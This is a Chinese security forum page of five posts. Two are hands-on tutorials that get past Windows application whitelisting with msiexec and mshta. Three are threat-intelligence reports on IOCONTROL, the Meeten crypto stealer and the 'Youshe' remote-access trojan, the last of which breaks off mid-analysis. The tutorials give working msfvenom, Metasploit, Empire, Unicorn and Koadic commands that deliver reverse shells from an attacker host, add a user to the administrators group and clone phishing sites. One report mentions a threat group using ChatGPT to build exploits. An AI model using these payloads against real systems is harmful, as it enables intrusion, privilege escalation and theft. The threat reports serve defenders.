跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    使用msiexec.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x00 前言 在我们之前的文章中,我们讨论了“Windows Applocker策略 - 初学者指南”,因为它们为应用程序控制策略定义了AppLocker规则,以及如何使用它们。但今天您将学习如何绕过AppLocker策略。在本文中,我们使用Windows AppLocker策略阻止了“cmd.exe”文件,并尝试绕过此限制以获得命令提示。 0x01 Applocker适用的关联文件格式 Windows AppLocker是在Windows 7和Windows Server 2008 R2中引入的一种安全策略,用于限制不需要的程序的使用。在这种情况下,管理员可以限制以下程序的执行: 这完全取决于系统管理员,为程序限制或执行设置AppLocker策略的程序或脚本。可能会出现命令提示符(cmd.exe)、PowerShell或dll文件或批处理文件、rundll32.exe、regsrv.32或regasm等被阻止的情况 0x02 挑战1:使用.msi文件绕过Applocker获取CMD 假设您处于类似的情况,所有上述应用程序都被阻止,并且只允许Windows Installer文件(即.msi扩展名)运行而不受任何限制。 那么,您将如何使用一个msi文件来绕过这些限制并获得一个完整的权限shell呢? 1.关于MSI文件的更多信息 MSI名称来自程序的原始标题Microsoft Installer。从那以后,名称改为Windows Installer。MSI文件扩展名文件是Windows软件包安装程序。安装程序包中包含Windows Installer安装或卸载应用程序所需的所有信息。每个安装包都包含一个.msi文件,其中包含安装数据库、摘要信息流和安装不同部分的数据流。 Windows Installer技术分为两部分,它们结合使用,包括客户端安装程序服务(msiexec.exe)和Microsoft软件安装(msi)包文件。Windows Installer使用包文件中包含的信息安装该程序。 msiexec.exe程序是Windows Installer的组件。当安装程序调用它时,msiexec.exe使用msi.dll读取包(.msi)文件,应用任何转换(.mst)文件,并合并安装程序提供的命令行选项。安装程序执行所有与安装相关的任务,包括将文件复制到硬盘、修改注册表、在桌面上创建快捷方式以及显示对话框,以便在必要时提示用户安装首选项。 在计算机上安装Windows Installer时,它会更改.msi文件的已注册文件类型,以便在双击.msi文件时,Msiexec.exe将与该文件一起运行。 每个MSI包文件都包含一个关系型数据库,该数据库存储在许多安装脚步中安装(和删除)程序所需的指令和数据。 2.获取CMD的多种方法 (1).第一种方法:使用msfvenom生成恶意.msi文件 现在,让我们在kali机器中打开一个新的终端,并生成一个恶意的msi包文件作为cmd.msi,通过使用windows/exec 执行exploit获得命令提示,如下所示: msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi python -m SimpleHTTPServer 80 现在在Windows计算机中传输cmd.msi文件,以获得命令提示符shell作为管理员。这里我们使用了python http服务器来共享网络中的文件。 在本地计算机上下载.msi文件后,可以使用以下语法在命令提示符下运行带有msiexec.exe的msi文件。 语法:msiexec /quiet /i msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi 只要你在运行提示符中点击上述命令,就会得到命令提示符。 (2).第二种方法:使用msfvenom生成恶意.msi文件 注意:即使您在另一个扩展名中重命名cmd.msi文件,它也会绕过该规则。 重复以上步骤,生成一个与msfvenom具有相同payload、并命名为cmd.png的msi文件。因为我的kali中已经有了一个cmd.msi文件,所以我将它重命名为cmd.png,并使用python服务器来传输它 在本地计算机(管理员阻止cmd.exe的Windows操作系统)上下载cmd.png文件(实际上是.msi文件)后,就可以使用以下语法在运行提示符内使用msiexec.exe运行.msi文件。 语法: msiexec /q /i msiexec /q /i http://192.168.1.107/cmd.png 只要你在运行提示符中点击上述命令,就会得到命令提示符。 (3).第三种方法:使用msfvenom生成恶意.msi文件 在上述方法中,我们通过使用windows/exec payload获得命令提示符,但现在我们将使用windows/meterpreter/reverse_tcp payload通过meterpreter会话获得完全权限的命令shell。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f msi > shell.msi 现在再次在Windows计算机中传输shell.msi文件,以获得命令提示符shell作为管理员并启动multi/handler。这里我们使用了python http服务器来共享网络中的文件。 在本地计算机上下载了shell.msi文件(管理员阻止了cmd.exe的Windows操作系统)后,可以使用以下语法在运行提示符内使用msiexec.exe运行.msi文件。 语法: msiexec /q /i msiexec /q /i http://192.168.1.107/shell.msi 只要您在运行提示符中点击上述命令,您将通过使用此payload的meterpreter会话获得命令提示。 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.107 msf exploit(handler) > set lport 1234 msf exploit(handler) > exploit meterpreter > shell 0x03 挑战2:使管理员组的本地用户成员 假设您处于类似的情况,所有上述应用程序都被阻止,并且只允许Windows Installer文件(即.msi扩展名)运行而不受任何限制。 那么如何使用MSI文件绕过这些限制,使管理员组的本地用户成员阻止cmd.exe运行? 注意:该aaru是本地用户帐户,不是非管理员用户帐户,如下所示: 我们知道由于applocker执行规则策略,cmd.exe在本地计算机上被阻止,因此我们无法使用命令提示符在管理员组中添加aaru。 (1).第四种方法:使用msfvenom生成恶意.msi文件 使用Windows/Exec payload生成MSI包作为admin.msi,该payload发送一条命令,指示将用户aaru的本地管理员权限添加到目标计算机中。 msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi 现在,在Windows计算机中传输admin.msi文件以将aaru添加到管理员组中。这里我们使用了python http服务器来共享网络中的文件。 下载完本地计算机的admin.msi文件(其中,admin阻止了cmd.exe的Windows操作系统)后,可以使用以下语法在运行提示符内运行带有msiexec.exe的admin.msi文件 语法:msiexec /q /i msiexec /q /i http://192.168.1.107/admin.msi 只要您在运行提示符中点击上述命令,就可以确保aaru用户已成为管理员帐户的一部分。 本文中我们将了解到,如何使用.msi文件来绕过操作系统策略限制而执行,在该系统中,cmd.exe和其他应用程序被管理员阻止。 参考文献: https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  2. ISHACK AI BOT

    使用mshta.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x00 简介 很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解析这些文件。 0x01 HTA重要性 最后,利用htaccess文件或基于浏览器的分类的其他策略转移将有助于提高利用率。利用HTA文件进行基于web的攻击。HTA文件中有大量的灵活性; 你将有效地使它看起来像一个Adobe更新程序。此外,通过HTTPS使HTA文件限制不使用少许SSL拦截/阻断的发现率也是有用的。HTA记录有助于绕过防病毒,因为它们仍没有被很好地识别到。最后但并非不重要的HTA也可以用于网络钓鱼,取代旧的Java applet。 0x02 攻击方法 HTA攻击有多种方法,如下所示: Metasploit Setoolkit Magic unicorn Msfvenom Empire CactusTorch Koadic Great SCT 1.第一种方法:Metasploit 我们的第一种方法是在Metasploit中使用inbuild exploit。为此,请进入到kali中的终端并输入命令:msfconsole metasploit包含“hta web server”模块,该模块生成恶意hta文件。此模块承载一个HTML应用程序(HTA),打开时将通过PowerShell运行有效负载。当用户打开HTA文件时,IE会在执行exploit之前提示用户两次。当Metasploit启动时,输入以下命令: use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit 一旦exploit被执行,它将为您提供扩展名为.hta的URL链接。同时,Metasploit将启动允许您共享文件的服务器。此链接您还必须在受害者的PC上运行。使用以下命令: mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta HTA的通常文件扩展名是.hta。我们使用了上面的命令,因为HTA被视为扩展名为.exe的任何可执行文件,因此通过mshta.exe执行。当hta由mshta.exe启动时,它使用签名的Microsoft二进制文件,允许您调用PowerShell并将payload直接注入内存中。 执行上述命令后,您将打开一个会话。要访问会话,请输入以下命令: sessions 1 因此,您将拥有一个meterpreter会话 2.第二种方法:Setoolkit 我们的HTA攻击方法是通过setoolkit来执行。为此,在您的kali中打开setoolkit。从菜单中选择第一个选项,输入1并选择第一个选项以选择Social-Engineering Attacks。 从下一个给定菜单中,通过输入2并选择第二个选项以选择website attack vendors 从下一个给定菜单中输入选项8以选择HTA attack method 一旦您为HTA攻击选择了选项8,接下来您需要选择选项2,它将允许您克隆一个站点。一旦选择了选项2,它将询问您要克隆的站点的URL。如我们在此提供的所需的URL:www.ignitectologies.in 在给出URL之后,它将要求您选择所需的meterpreter类型。通过输入3以选择第三个meterprter reverse tcp. 键入3后按Enter键,进程将启动,您将拥有handler(multi/handler) 现在把你的恶意IP转换成短链接,当你向受害者分享此链接时,这将显示给受害者更真实的攻击 当受害者浏览上述恶意链接时,文件保存后会自动保存在受害者电脑中执行,如下图所示: 然后您将拥有一个meterpreter会话。您可以使用命令'sysinfo'获取受害者电脑的基本信息 3.第三种方法:Magic Unicorn HTA攻击的下一个方法是使用unicorn的第三方工具。magic unicorn工具由Dave Kennedy开发。它是一款用户友好性的工具,它允许我们通过将shellcode直接注入内存来执行HTA攻击。该工具的最佳部分是它与Metasploit兼容,以及shellcode和cobalt strik。您可以在trustedsec.com上详细查看该软件,也可以从GitHub下载该软件,或者使用以下链接下载:https://github.com/trustedsec/unicorn 一旦你下载了magic unicorn。在kali的终端打开并输入: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta 执行上述命令将启动创建.hta文件的过程。上诉.hta文件将在文件夹hta-attack/中被创建。进入该文件夹,通过键入以下命令查看创建的文件列表: cd hta_attack/ ls 现在您可以看到.hta文件,即launcher.hta。启动python服务器以便共享此文件。为此,请输入以下命令: python -m SimpleHTTPServer 80 服务器启动并运行后,在受害者PC的cmd提示符中执行以下命令: mshta.exe http://192.168.1.109/Launcher.hta 当执行上述命令时,您将在multi/handler中激活会话。要访问会话,请键输入以下命令: sessions 1 4.第四种方法:MSFVenom HTA攻击的下一种方法是通过msfvenom手动创建.hta文件。创建.hta文件,在kali终端中键输入以下命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta 执行上述命令将创建一个.hta文件,您可以利用该文件。创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC: python -m SimpleHTTPServer 80 输入以下命令运行上述文件: mshta.exe http:192.168.1.109/shell.hta 同时,在受害者的命令提示符中运行上述文件时,启动handler以接收会话。要启动multi/handler,请输入以下命令: use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 因此,通过使用这种简单的方法,您将获得您的meterpreter会话。您可以使用sysinfo查看受害者PC的基本信息。 5.第五种方法:PowerShell Empire 对于我们的下一个msbuild攻击方法,我们将使用empire。empire是一款后开发框架。到目前为止,我们已经将我们的XML工具与Metasploit匹配,但在这种方法中,我们将使用empire框架。它只是基于python的PowerShell windows代理,这使得它非常有用。Empire由@harmj0y、@sixdub、@enigam0x3、rvrsh3ll、@killswitch_gui和@xorrier开发。您可以从https://github.com/EmpireProject/Empire下载此框架。 要获得empire的基本指南,请访问我们的文章: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/ 启动Empire框架后,输入listener以检查是否有任何活动的侦听器。如下图所示,没有活动的侦听器。需要设置一个侦听器,请输入以下命令: uselistener http set Host http://192.168.1.109 set port 80 execute 使用上述命令,您将获得一个活动的侦听器。输入back以退出侦听器,以便启动PowerShell。 对于我们的msbuild攻击,我们将使用stager。empire中的stager是一段代码段,它允许我们的恶意代码通过被感染主机上的代理运行。因此,对于这种类型,请输入以下命令: usestager windows/hta set Listener http set OutFile /root/Desktop/1.hta execute usestager将创建一个恶意代码文件,该文件将保存在名为1.hta的outfile中。一旦文件被执行,我们将在侦听器上获得结果。通过输入以下命令运行受害者的文件: mshta.exe http://192.168.1.109:8080/1.h 要查看是否有会话,请打开输入命令“agents”。这样做将向您显示您拥有的会话的名称。要访问该会话请输入以下命令: interact L924Z1WR 上面的命令将允许您访问会话 sysinfo info 6.第六种方法:Cactustorch Cactustorch是javascript和VBScript shellcode启动器的框架。它由Vincent Yiu开发。这个工具可以绕过许多常见的防御,这对我们来说是一种优势。需要注意的主要问题是我们在cactustorch中使用的代码是通过msfvenom创建的,然后编码到Base64中,因为它只支持它。 所以,首先让我们创建我们的恶意软件,然后加密它。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f raw > 1.bin 现在加密文件类型: cat 1.bin |base64 -w 0 复制base64代码,以便稍后使用。 现在我们准备好了恶意软件,让我们下载cactustorch。你可以从这里下载: https://github.com/mdsecactivebreach/CACTUSTORCH 安装完成后,在安装的文件夹内容中输入以下内容: ls -la ./CACTUSTORCH.hta 上面的命令将启动cactustorch进行hta攻击 一旦cactustorch启动,将base64代码粘贴到下图所示的突出的代码处,这是先前复制的。 当我们添加了代码时,让我们通过键输入以下内容在受害者的PC中执行该文件: mshta.exe http://192.168.1.109/CACTUSTORCH.hta 同时,启动multi/handler以接收会话。对于multi/handler,请输入以下命令: use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 在受害者的PC中执行该文件后,您将获得一个meterpreter会话。 7.第七种方法:Koadic 我们的下一种方法是使用koadic。Koadic是一个Windows后期开发的rootkit,类似于其他渗透测试工具,如meterpreter和PowerShellEmpire。要了解更多关于Koadic的信息,请通过以下链接阅读我们关于上述框架的详细文章:https://www.hackingarticles.in/koadic-com-command-control-framework 一旦Koadic启动并运行,请输入info以获取需要提供的详细帮助信息列表,以便进行获取会话。通过查看的信息,您需要设置srvhost和endpoint。因此,要设置它们,请输入: set srvhost 192.168.1.107 set ENDPOINT sales run 键入以下内容,执行您在受害者PC中的文件: http://192.168.1.107:9999/sales 您将获得一个正在运行的会话。要知道会话类型的名称,输入以下命令: zombies 现在要访问会话类型,请输入以下命令: zombies 0 8.第八种方法:GreatSCT GreatSCT是一款允许您使用Metasploit exploit并允许它绕过大多数反病毒的工具。GreatSCT目前得到了@ConsciousHacker的支持。你可以从下面地址中下载: https://github.com/GreatSCT/GreatSCT 下载并运行后,输入以下命令以访问模块: use Bypass 查看payload列表类型,输入list命令: list 现在,从有payload表中,您可以选择任何目标进行所需的攻击。但对于这种攻击,我们将使用: use mshta/shellcode_inject/base64_migrate.py 执行命令后,输入以下命令: generate 执行generate命令后,它会询问您要使用哪种方法。因为我们将使用msfvenom类型1来选择第一个选项。然后按enter键进入meterpreter。然后分别设置lhost和lport,即192.168.1.107和4321。 生成shellcode时,它会要求您为exploit命名。默认情况下,它将设置名称为“payload”,以便您可以提供名称,或者只需按Enter键进行默认设置。 现在,生成了两个文件。一个资源文件和另一个hta文件 现在,首先,在/usr/share/greatsct输出中输入以下命令启动python的服务器: python -m SimpleHTTPServer 80 现在在受害者PC的命令提示符中执行hta文件 同时,使用资源文件启动multi/handler。为此,输入以下命令: msfconsole -r /usr/share/greatsct-output/handlers/payload.rc 你将获得一个meterpreter会话 0x03 总结 所以基本上,这种类型的攻击是简单的HTA攻击,提供对远程攻击者的完全访问权限。攻击者可以使用Web技术为Windows操作系统创建恶意应用程序来克隆站点。简而言之,它通过HTA文件执行PowerShell注入,可以通过浏览器用于基于Windows的PowerShell开发。以上是用于攻击的方法。 因此,通过不同的方法学习相同的攻击通常是很方便的
  3. ISHACK AI BOT

    新的 IOCONTROL 恶意软件用于关键基础设施攻击

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    伊朗恶意分子正在利用名为 IOCONTROL 的新恶意软件来破坏以色列和美国关键基础设施使用的物联网 (IoT) 设备和 OT/SCADA 系统。 目标设备包括路由器、可编程逻辑控制器 (PLC)、人机界面 (HMI)、IP 摄像头、防火墙和燃料管理系统。该恶意软件的模块化特性使其能够危害不同制造商的各种设备,包括 D-Link、Hikvision、Baicells、Red Lion、Orpak、Phoenix Contact、Teltonika 和 Unitronics。 Claroty 的 Team82 研究人员发现了 IOCONTROL 并对其进行了采样进行分析,他们报告说,这是一种民族国家网络武器,可以对关键基础设施造成严重破坏。 鉴于持续的地缘政治冲突,IOCONTROL 目前用于针对以色列和美国的系统,例如 Orpak 和 Gasboy 燃料管理系统。据报道,该工具与一个名为 CyberAv3ngers 的伊朗黑客组织有关,该组织过去曾对攻击工业系统表现出兴趣。 OpenAI 最近还报告称,该威胁组织使用 ChatGPT 来破解 PLC、开发自定义 bash 和 Python 漏洞利用脚本,并计划入侵。 IOCONTROL 攻击 Claroty 从 Gasboy 燃油控制系统中提取了恶意软件样本,特别是该设备的支付终端 (OrPT),但研究人员并不确切知道黑客是如何用 IOCONTROL 感染它的。 在这些设备内部,IOCONTROL 可以控制泵、支付终端和其他外围系统,从而可能导致中断或数据被盗。 威胁者在 Telegram 上声称破坏了以色列和美国的 200 个加油站,这与 Claroty 的调查结果一致。这些攻击发生在 2023 年末,大约与水处理设施中的 Unitronics Vision PLC/HMI 设备遭到破坏的时间相同,但研究人员报告称,新的攻击活动于 2024 年中期出现。截至 2024 年 12 月 10 日,66 个 VirusTotal 防病毒引擎均未检测到 UPX 打包的恶意软件二进制文件。 Gasboy 燃油控制系统是从中提取恶意软件的地方 恶意软件功能 该恶意软件以“iocontrol”名称存储在“/usr/bin/”目录中,使用模块化配置来适应不同的供应商和设备类型,针对广泛的系统架构。它使用持久性脚本(“S93InitSystemd.sh”)在系统启动时执行恶意软件进程(“iocontrol”),因此重新启动设备不会将其停用。 它通过端口 8883 使用 MQTT 协议与其命令和控制 (C2) 服务器进行通信,这是物联网设备的标准通道和协议。唯一的设备 ID 嵌入到 MQTT 凭证中,以实现更好的控制。 DNS over HTTPS (DoH) 用于解析 C2 域,同时规避网络流量监控工具,并且恶意软件的配置使用 AES-256-CBC 进行加密。 IOCONTROL 支持的命令如下: ·发送“hello”:向C2报告详细的系统信息(例如主机名、当前用户、设备型号)。 ·检查执行:确认恶意软件二进制文件已正确安装且可执行。 ·执行命令:通过系统调用运行任意操作系统命令并报告输出。 ·自删除:删除自己的二进制文件、脚本和日志以逃避检测。 ·端口扫描:扫描指定的 IP 范围和端口以识别其他潜在目标。 上述命令是使用从“libc”库动态检索的系统调用执行的,并将输出写入临时文件以进行报告。 简化的攻击流程 鉴于 IOCONTROL 目标在关键基础设施中的作用以及该组织的持续活动,Claroty 的报告为防御者提供了宝贵的资源,可以帮助他们识别和阻止威胁。
  4. ISHACK AI BOT

    冒充会议应用程序的加密窃取恶意软件瞄准 Web3 专业人士

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    网络犯罪分子利用欺诈性视频会议平台以窃取加密货币的恶意软件感染 Windows 和 Mac 电脑,通过虚假商务会议来瞄准 Web3 工作人员。 该情况根据会议软件常用的名称被称为“Meeten”,自 2024 年 9 月以来一直在进行。该恶意软件有 Windows 和 macOS 版本,目标是受害者的加密货币资产、银行信息、存储在网络上的信息浏览器和钥匙串凭据(在 Mac 上)。 Meeten 是由 Cado 安全实验室发现的,该实验室称,威胁者不断更改假冒会议软件的名称和品牌,之前曾使用过“Clusee”、“Cuesee”、“Meetone”和“Meetio”等名称。 网站传播 Realst 盗窃者 这些假冒品牌在其中填充了人工智能生成的内容,以增加合法性,看似得到了官方网站和社交媒体帐户的支持。访问者通过网络钓鱼或社交工程进入该网站,并被提示下载所谓的会议应用程序,但实际上,它是 Realst 窃取程序。 根据报告,该骗局以多种方式进行。在一个报告的实例中,用户认识的人在 Telegram 上联系了该用户,希望讨论商业机会并安排通话。然而,Telegram 帐户已创建更有趣的是,诈骗者向他发送了目标公司的投资演示,表明这是一个复杂的、有针对性的骗局。 其他报告称,目标用户正在接听与 Web3 工作相关的电话、下载软件并进行诈骗。他们的加密货币被盗之后。初次接触时,目标将被引导至 Meeten 网站下载产品。除了托管信息窃取程序外,Meeten 网站还包含 Javascript,甚至可以在安装任何恶意软件之前窃取存储在网络浏览器中的加密货币。 Cado 表示,除了 Realst 恶意软件之外,“Meeten”网站还托管 JavaScript,试图耗尽连接到该网站的钱包。 针对 Mac 和 Windows 选择下载 macOS 版本会议软件的用户会获得一个名为“CallCSSetup.pkg”的软件包,但过去也曾使用过其他文件名。执行时,它使用 macOS 命令行工具“osascript”要求用户输入系统密码,从而导致权限升级。 向用户提供密码提示 输入密码后,恶意软件将显示一条诱饵消息,指出“无法连接到服务器。请重新安装或使用 VPN。”然而,在后台,Realst 恶意软件会窃取计算机上托管的数据,包括: ·电报凭证 ·银行卡详细信息 ·钥匙串凭证 ·来自 Google Chrome、Opera、Brave、Microsoft Edge、Arc、CocCoc 和 Vivaldi 的浏览器 cookie 和自动填充凭据 ·Ledger 和 Trezor 钱包 数据首先存储在本地文件夹中,经过压缩,最终连同机器详细信息(例如版本名称、版本和系统信息)一起泄露到远程地址。 Realst 的 Windows 变体以 Nullsoft 脚本安装程序系统 (NSIS) 文件形式分发,名为“MeetenApp.exe”,并且还使用从 Brys Software 窃取的证书进行数字签名。 有效负载的数字签名 安装程序包含一个 7zip 存档(“app-64”)和一个 Electron 应用程序的核心(“app.asar”),其中包含 JavaScript 和资源,使用 Bytenode 编译为 V8 字节码以逃避检测。 Electron 应用程序连接到位于“deliverynetwork[.]observer”的远程服务器,并下载受密码保护的存档(“AdditionalFilesForMeet.zip”),其中包含系统分析器(“MicrosoftRuntimeComponentsX86.exe”)和主要恶意软件负载(“UpdateMC.exe”) ”)。 恶意软件收集的系统信息 基于 Rust 的可执行文件尝试收集以下信息,将其添加到 ZIP 文件中,然后将其泄露: ·电报凭证 ·银行卡详细信息 ·来自 Google Chrome、Opera、Brave、Microsoft Edge、Arc、CocCoc 和 Vivaldi 的浏览器 cookie、历史记录和自动填充凭据 ·Ledger、Trezor、Phantom 和 Binance 钱包 与 macOS 相比,Windows 版本具有更复杂、更通用的有效负载传送机制、更好的规避能力,以及通过注册表修改在重新启动之间保留的能力。 总体而言,用户在未首先验证该软件是否合法,然后使用 VirusTotal 等多引擎防病毒工具进行扫描的情况下,切勿安装他人通过社交媒体推荐的软件。 从事 Web3 工作的人员尤其容易受到攻击,因为社交工程是一种常见策略,用于与该领域的目标建立融洽关系,然后最终诱骗目标安装恶意软件以窃取加密货币。
  5. ISHACK AI BOT

    钓鱼下载网站传播“游蛇”威胁,恶意安装程序暗藏远控木马

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    1 概览 “游蛇”黑产团伙(又名“银狐”、“谷堕大盗”、“UTG-Q-1000”等)自2022年下半年开始活跃至今,针对国内用户发起了大量攻击活动,以图窃密和诈骗,对企业及个人造成了一定的损失。该黑产团伙主要通过即时通讯软件(微信、企业微信等)、搜索引擎SEO推广、钓鱼邮件等途径传播恶意文件,其传播的恶意文件变种多、免杀手段更换频繁且攻击目标所涉及的行业广泛。近期,安天CERT监测到“游蛇”黑产团伙利用仿冒成远程控制软件下载站点的钓鱼网站传播恶意MSI安装程序。 当恶意MSI安装程序执行后,会在用户选择的安装路径中释放一个正常的安装程序以及一个恶意程序,在桌面中创建指向正常安装程序的快捷方式,并执行恶意程序。恶意程序执行后,从指定URL处获取shellcode并在内存中执行。该shellcode通过异或解密算法进行自解密,在内存中执行嵌入其中的1.dll文件。1.dll文件从指定URL处下载、执行两段shellcode。 第一段shellcode在内存中释放执行RpcTsch.dll,该DLL文件通过RPC创建称为“MM”的计划任务;第二段shellcode在内存中释放执行Dll1.dll,该DLL文件持续对剪贴板内容进行监控,并对符合指定条件的内容进行窃取并连续截取20张图片,推测该DLL文件用于窃取加密货币钱包地址及密钥信息,可能存在黑产团伙之间的“黑吃黑”行为。然后,1.dll对当前的系统环境进行多种检测,收集各类系统信息、构建上线包并与C2服务器连接。攻击者能够利用该恶意文件进行远程控制、信息窃取等恶意操作。 “游蛇”黑产团伙仍在频繁地对恶意软件及免杀手段进行更新,并且由于该黑产团伙使用的远控木马及攻击组件的源代码在网络中流传,因此存在更多恶意变种,每天依旧有一定数量的用户遭受攻击并被植入远控木马。安天CERT建议用户从官方网站下载安装应用程序,避免点击安全性未知的可执行程序、脚本、文档等文件,以免遭受“游蛇”攻击造成损失。 经验证,安天智甲终端防御系统(简称IEP)可有效查杀该远控木马。相关防护建议详见第四章节。 2 技术梳理 2.1 传播阶段 在此次攻击活动中,攻击者利用仿冒成ToDesk、向日葵等远程控制软件下载站点的钓鱼网站传播恶意程序,并且恶意程序会下载执行用于窃取加密货币钱包地址及密钥信息的组件,因此其攻击目标可能更偏向于网络管理类人员以及涉及黑灰产的人员。当用户点击钓鱼网站中的“下载”按钮时,下载到的将会是打包成压缩文件的恶意安装程序。 图 2‑1仿冒ToDesk的钓鱼网站 图 2‑2仿冒向日葵的钓鱼网站 此外,攻击者也在利用仿冒Gmail等电子邮箱登录页面的钓鱼网页传播恶意程序,推测攻击者可能会结合利用钓鱼邮件进行攻击活动。 图 2‑3仿冒Gmail登录页面的钓鱼网页 2.2 攻击流程 攻击者利用钓鱼网站传播恶意MSI安装程序,当恶意MSI安装程序执行后,会在用户选择的安装路径中释放一个正常的安装程序以及一个恶意程序,在桌面创建指向正常安装程序的快捷方式,并执行恶意程序。 恶意程序执行后,从指定URL处获取shellcode保存为C:\ProgramData\3文件,并在内存中执行该shellcode。该shellcode通过异或解密算法进行自解密,在内存中执行嵌入其中的1.dll。1.dll创建C:\Users\Public\Documents\MM文件夹,将恶意程序复制到该文件夹中命名为svchos1.exe,然后下载两段shellcode至该文件夹中。 第一段shellcode在内存中释放执行RpcTsch.dll,该DLL文件通过RPC创建名称为“MM”的计划任务;第二段shellcode在内存中释放执行Dll1.dll,该DLL文件持续对剪贴板内容进行监控,对符合指定条件的内容进行窃取并同时连续截取20张图片,推测该DLL文件用于窃取加密货币钱包地址及密钥信息。然后,1.dll通过创建文件及写注册表的方式记录感染时间,创建C:\ProgramData\9.ini文件以及C:\ProgramData\Microsoft Drive1文件夹,遍历窗口检查是否存在指定的安全产品或工具。确认没有相关安全产品或工具运行后,1.dll收集各类系统信息,用以构建上线包与C2服务器进行连接。 上述恶意程序的执行流程如下图所示: 图 2‑4样本执行流程图 3 样本分析 3.1 MSI程序 该恶意MSI程序伪装成ToDesk的安装程序,执行后会将正常的ToDesk下载器以及名称为“aaa安装9.exe”的恶意程序释放至用户选择的安装路径中,并执行该恶意程序。 图 3‑1该恶意MSI程序释放的文件 同时,该恶意MSI程序也会在桌面上创建一个快捷方式,指向正常的ToDesk下载器。 图 3‑2在桌面创建指向正常ToDesk下载器的快捷方式 3.2 aaa安装9.exe 恶意程序“aaa安装9.exe”运行后,从硬编码的URL处下载载荷文件,并保存为文件C:\ProgramData\3。 图 3‑3从硬编码的URL处下载文件并保存至指定路径 当执行过程中出现异常时,该程序会弹窗显示错误信息。 图 3‑4出现异常时弹窗 该程序读取文件C:\ProgramData\3,根据文件大小申请一段内存空间,并将该文件内容写入申请的内存空间中执行。 图 3‑5执行下载的shellcode 该shellcode执行后,通过异或解密的方式对自身代码进行解密。 图 3‑6该shellcode通过异或算法进行自解密 申请一段内存空间,将嵌入其中的PE文件写入该段内存中,将内存保护属性指定为PAGE_EXECUTE_READWRITE,然后执行该PE文件。 图 3‑7执行下一阶段的PE文件 3.3 1.dll 该PE文件是DLL文件,原名称为“1.dll”。 图 3‑8 该PE文件信息 1.dll在内存中执行后,检查是否存在C:\Users\Public\Documents\MM\svchos1.exe,若不存在该文件,则检查当前进程是否具有管理员权限,若不是则以管理员权限重新执行当前进程。确认具有管理员权限后,1.dll执行cmd命令在C:\Users\Public\Documents创建MM文件夹,将“aaa安装9.exe”复制到该文件夹中,并命名为svchos1.exe。随后,1.dll创建两个线程,分别从指定URL处下载4.txt和7.txt至C:\Users\Public\Documents\MM中,并执行这两个shellcode。完成以上操作后,1.dll执行其Shellex函数。 图 3‑9 1.dll主要执行流程 3.3.1 shellcode-1 该shellcode同样使用异或算法进行自解密,然后将嵌入其中的PE文件写入内存中执行。该PE文件的原名称为“RpcTsch.dll”,pdb路径为“C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb”。 图 3‑10 RpcTsch.dll信息 RpcTsch.dll 该DLL文件通过RPC创建计划任务,计划任务名称为MM,用于当任何用户登录时执行C:\Users\Public\Documents\MM\svchos1.exe。 图 3‑11通过RPC创建计划任务 3.3.2 shellcode-2 该shellcode同样使用异或算法进行自解密,然后将嵌入其中的PE文件写入内存中执行。该PE文件原名称为“Dll1.dll”,pdb路径为“C:\Users\ZZ\Desktop\截图\Release\Dll1.pdb”。 Dll1.dll 该DLL文件持续对剪贴板进行监控,每隔0.5秒窃取符合条件的剪贴板内容并进行截图操作。 图 3‑12 Dll1.dll文件的主要功能 当剪贴板中的内容以T开头且长度小于45时,该DLL文件会将剪贴板内容保存至C:\ProgramData\Microsoft Drive\stop.ini中,在同一文件夹中创建以当前日期时间命名的文件夹,同时连续截取20张图片并保存至该文件夹中。 图 3‑13将符合条件的剪贴板内容保存至stop.ini中并截图 当剪贴板中的内容符合以下条件时,该DLL文件会将剪贴板内容保存至C:\ProgramData\Microsoft Drive\Desktop.ini中,同时连续截取20张图片保存至以当前日期时间命名的文件夹中: 1.字符串长度为64 2.字符串长度大于65且第66位是T 3.字符串以Key开头且长度大于68 4.字符串以0x开头且长度大于40 图 3‑14将符合条件的剪贴板内容保存至Desktop.ini中并截图 3.4 执行Shellex函数 执行Shellex函数时,首先解析硬编码在其中的配置信息,用于后续选择是否执行指定的功能。 图 3‑15解析配置信息 